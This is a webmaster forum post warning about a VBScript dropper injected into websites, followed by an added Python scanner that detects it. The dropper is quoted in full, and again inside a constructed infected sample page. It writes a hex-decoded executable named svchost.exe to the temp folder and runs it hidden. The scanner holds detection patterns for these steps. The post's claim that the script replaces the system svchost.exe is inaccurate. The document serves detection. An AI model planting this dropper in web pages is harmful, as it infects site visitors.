I received an email from a colleague who works in web security, warning about a script that is circulating on many sites and installs a virus on visitors' PCs. I was told to check all my sites to see whether the HTML files contained the following code:
' Dropper: decodes the hex string in WriteData into an executable, writes it to the user's temp folder and launches it hidden
DropFileName = "svchost.exe"
WriteData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
' Scripting.FileSystemObject gives the script full file-system access
Set FSO = CreateObject("Scripting.FileSystemObject")
' GetSpecialFolder(2) is TemporaryFolder (%TEMP%), so the file is written there, not to the system folder
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    ' Decode WriteData two hex digits at a time into raw bytes ("&H.." is a VBScript hex literal)
    For i = 1 To Len(WriteData) Step 2
        FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
End If
' Run the dropped file; window style 0 means no visible window
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
This script replaces the svchost.exe file on the visitor's computer with an svchost.exe containing a virus.
This file is always active on computers and can cause a lot of damage.
Also check your sites to make sure there is nothing there; I was told that many sites are being broken into by hackers who insert this script into the sites' files, and if we don't detect it, it will infect our visitors.
I have already checked all my sites and found nothing, but it is worrying to know that there are people doing this.
If the colleagues at +t know the origin of this threat, it would be good if they reported it here.
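The post asks everyone to check their sites for the script above. The scanner below is an added example (it is not the poster's code and not part of the original thread): it walks a directory of web files, flags any file that carries several of the dropper's indicators (the FileSystemObject and WScript.Shell instantiations, the GetSpecialFolder(2) temp-folder lookup, the two-hex-digit Chr(CLng("&H"...)) decode loop and the hidden .Run ..., 0 call), reproduces the script's own decode loop on the WriteData string so the dropped file can be hashed, and checks whether the decoded bytes start with the "MZ" header of a Windows executable. The sample pages, the `SAMPLE_INFECTED`/`SAMPLE_CLEAN` names, the `demo()` helper and the short fake WriteData value are all constructed for the example; the real payload in the post was elided.

```python
"""Scan web files for the VBScript dropper quoted in the post (added example)."""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# Indicators taken from the quoted script. Case-insensitive and whitespace-tolerant,
# since injected copies are often re-indented or re-cased; deliberate obfuscation
# (string splitting, Execute/Eval) would still evade a pattern scanner like this.
INDICATORS = {
    "filesystemobject": re.compile(r'CreateObject\s*\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "temp_folder": re.compile(r"GetSpecialFolder\s*\(\s*2\s*\)", re.I),
    "hex_decode_loop": re.compile(r'Chr\s*\(\s*CLng\s*\(\s*"&H"\s*&\s*Mid\s*\(', re.I),
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "hidden_run": re.compile(r"\.Run\s+\w+\s*,\s*0\b", re.I),
}
WRITEDATA_RE = re.compile(r'WriteData\s*=\s*"([0-9A-Fa-f]+)"', re.I)
DROPNAME_RE = re.compile(r'DropFileName\s*=\s*"([^"]+)"', re.I)
MIN_INDICATORS = 3  # several must co-occur before a file is reported, to limit false positives


@dataclass
class Finding:
    path: str
    indicators: List[str]
    drop_name: Optional[str]
    payload_sha256: Optional[str]
    payload_is_pe: bool


def decode_writedata(hexstr: str) -> bytes:
    """Reproduce the script's loop: Mid(WriteData, i, 2) -> CLng("&H..") -> Chr().
    A trailing odd digit is decoded on its own, exactly as Mid() would return it."""
    out = bytearray()
    for i in range(0, len(hexstr), 2):
        out.append(int(hexstr[i:i + 2], 16) & 0xFF)
    return bytes(out)


def scan_text(text: str) -> List[str]:
    """Names of the dropper indicators present in a file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def analyse_file(path: str, text: str) -> Optional[Finding]:
    """Return a Finding when enough indicators co-occur, including the payload hash."""
    hits = scan_text(text)
    if len(hits) < MIN_INDICATORS:
        return None
    drop = DROPNAME_RE.search(text)
    data = WRITEDATA_RE.search(text)
    payload = decode_writedata(data.group(1)) if data else b""
    return Finding(
        path=path,
        indicators=hits,
        drop_name=drop.group(1) if drop else None,
        payload_sha256=hashlib.sha256(payload).hexdigest() if payload else None,
        payload_is_pe=payload[:2] == b"MZ",  # DOS/PE header of a Windows executable
    )


def scan_directory(root: str, exts=(".html", ".htm", ".php", ".asp", ".js")) -> List[Finding]:
    """Walk a web root and report every file that looks injected."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = analyse_file(path, fh.read())
                if result:
                    findings.append(result)
    return findings


# Constructed sample pages. The WriteData value is a fake 8-byte "MZ" prefix, not a real binary.
SAMPLE_INFECTED = """<html><body>
<script language="VBScript">
DropFileName = "svchost.exe"
WriteData = "4D5A900003000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\\\\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
</script>
</body></html>"""
SAMPLE_CLEAN = "<html><body><p>Welcome</p><script>document.title = 'Home';</script></body></html>"


def demo() -> List[Finding]:
    """Write the two constructed pages into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_INFECTED)
        with open(os.path.join(root, "about.html"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_CLEAN)
        return scan_directory(root)


if __name__ == "__main__":
    for f in demo():
        print(f.path, f.indicators, f.drop_name, f.payload_sha256, "PE" if f.payload_is_pe else "not PE")
```

Point `scan_directory()` at a site's document root; every reported file should be restored from a known-clean copy, and the SHA-256 of the decoded payload is what to compare against antivirus or sandbox reports rather than the "svchost.exe" file name, which the dropper chooses precisely because it looks like a legitimate system process.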